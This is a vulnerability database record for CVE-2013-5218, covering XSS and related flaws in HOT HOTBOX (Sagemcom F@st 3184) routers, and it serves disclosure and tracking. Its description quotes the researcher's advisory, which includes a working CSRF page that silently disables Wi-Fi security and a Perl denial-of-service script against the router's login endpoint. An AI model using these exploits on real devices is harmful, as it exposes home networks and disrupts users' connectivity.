ID

VAR-201312-0374


CVE

CVE-2013-5218


TITLE

HOT HOTBOX Router Software cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2013-005734

DESCRIPTION

Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. A cross-site scripting vulnerability exists in HOT HOTBOX routers using software version 2.1.11. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+ Vulnerabilities List - # Default WPS Pin # Authentication based on IP Address # DoS via crafted POST # Path/Directory Traversal # Script injection via DHCP request # No CSRF Token Demo - http://www.youtube.com/watch?v=CPlT09ZIj48 CSRF EXPLOIT: <html> <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1> <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr"> <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1"> <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1"> <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode"> <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1"> <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1"> <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1"> <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity"> <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity"> <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1"> <input type=hidden name="scanActions1" value="0" id="scanActions1"> <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1"> <input type=hidden name="wpsActions1" value="0" id="wpsActions1"> </form> </html> <script>document.getElementById(1).submit();</script> DENIAL OF SERVICE EXPLOIT: use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent; # Author: Oz Elisyan # Date: 3 September 2013 # Affected Version: <= 2.1.11 print "# HOTBOX DoS PoC #\n\n" unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); } print "Sending Evil POST request...\n"; my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req); print "Done.";

Trust: 2.61

sources: NVD: CVE-2013-5218 // JVNDB: JVNDB-2013-005734 // CNVD: CNVD-2014-00018 // BID: 63550 // VULHUB: VHN-65220 // PACKETSTORM: 123901

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-00018

AFFECTED PRODUCTS

vendor:hotmodel:hotbox routerscope:eqversion:2.1.11

Trust: 3.0

vendor:hotmodel:hotbox routerscope:eqversion: -

Trust: 1.0

vendor:hotmodel:hotbox routerscope: - version: -

Trust: 0.8

vendor:sagecommodel:f@st routerscope:eqversion:31842.1.11

Trust: 0.3

sources: CNVD: CNVD-2014-00018 // BID: 63550 // JVNDB: JVNDB-2013-005734 // CNNVD: CNNVD-201312-563 // NVD: CVE-2013-5218

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-5218
value: LOW

Trust: 1.0

NVD: CVE-2013-5218
value: LOW

Trust: 0.8

CNVD: CNVD-2014-00018
value: LOW

Trust: 0.6

CNNVD: CNNVD-201312-563
value: LOW

Trust: 0.6

VULHUB: VHN-65220
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2013-5218
severity: LOW
baseScore: 2.9
vectorString: AV:A/AC:M/AU:N/C:N/I:P/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 5.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-00018
severity: LOW
baseScore: 2.9
vectorString: AV:A/AC:M/AU:N/C:N/I:P/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 5.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-65220
severity: LOW
baseScore: 2.9
vectorString: AV:A/AC:M/AU:N/C:N/I:P/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 5.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2014-00018 // VULHUB: VHN-65220 // JVNDB: JVNDB-2013-005734 // CNNVD: CNNVD-201312-563 // NVD: CVE-2013-5218

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-65220 // JVNDB: JVNDB-2013-005734 // NVD: CVE-2013-5218

THREAT TYPE

specific network environment

Trust: 0.6

sources: CNNVD: CNNVD-201312-563

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201312-563

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-005734

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-65220

PATCH

title:Top Pageurl:http://www.hot.net.il/heb/Main/

Trust: 0.8

sources: JVNDB: JVNDB-2013-005734

EXTERNAL IDS

db:NVDid:CVE-2013-5218

Trust: 3.5

db:PACKETSTORMid:123901

Trust: 3.2

db:BIDid:63550

Trust: 0.9

db:JVNDBid:JVNDB-2013-005734

Trust: 0.8

db:CNNVDid:CNNVD-201312-563

Trust: 0.7

db:CNVDid:CNVD-2014-00018

Trust: 0.6

db:EXPLOIT-DBid:29518

Trust: 0.1

db:VULHUBid:VHN-65220

Trust: 0.1

sources: CNVD: CNVD-2014-00018 // VULHUB: VHN-65220 // BID: 63550 // JVNDB: JVNDB-2013-005734 // PACKETSTORM: 123901 // CNNVD: CNNVD-201312-563 // NVD: CVE-2013-5218

REFERENCES

url:http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html

Trust: 3.1

url:http://www.youtube.com/watch?v=cplt09zij48

Trust: 2.4

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5218

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5218

Trust: 0.8

url:http://www.sagemcom.com/index.php?id=1760&l=25

Trust: 0.3

url:http://seclists.org/fulldisclosure/2013/nov/17

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2013-5038

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5220

Trust: 0.1

url:http://$host/goform/login";

Trust: 0.1

url:http://192.168.1.1/goform/wlanbasicsecurity'

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5037

Trust: 0.1

url:http://elisyan.com/hotboxcsrf.html

Trust: 0.1

url:http://elisyan.com/hotboxdos.pl,

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5039

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5219

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5218

Trust: 0.1

sources: CNVD: CNVD-2014-00018 // VULHUB: VHN-65220 // BID: 63550 // JVNDB: JVNDB-2013-005734 // PACKETSTORM: 123901 // CNNVD: CNNVD-201312-563 // NVD: CVE-2013-5218

CREDITS

Oz Elisyan

Trust: 0.4

sources: BID: 63550 // PACKETSTORM: 123901

SOURCES

db:CNVDid:CNVD-2014-00018
db:VULHUBid:VHN-65220
db:BIDid:63550
db:JVNDBid:JVNDB-2013-005734
db:PACKETSTORMid:123901
db:CNNVDid:CNNVD-201312-563
db:NVDid:CVE-2013-5218

LAST UPDATE DATE

2025-04-11T22:48:26.745000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2014-00018date:2014-01-02T00:00:00
db:VULHUBid:VHN-65220date:2013-12-30T00:00:00
db:BIDid:63550date:2013-09-09T00:00:00
db:JVNDBid:JVNDB-2013-005734date:2014-01-06T00:00:00
db:CNNVDid:CNNVD-201312-563date:2013-12-31T00:00:00
db:NVDid:CVE-2013-5218date:2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:CNVDid:CNVD-2014-00018date:2014-01-02T00:00:00
db:VULHUBid:VHN-65220date:2013-12-30T00:00:00
db:BIDid:63550date:2013-09-09T00:00:00
db:JVNDBid:JVNDB-2013-005734date:2014-01-06T00:00:00
db:PACKETSTORMid:123901date:2013-11-04T13:03:33
db:CNNVDid:CNNVD-201312-563date:2013-12-31T00:00:00
db:NVDid:CVE-2013-5218date:2013-12-30T04:53:07.287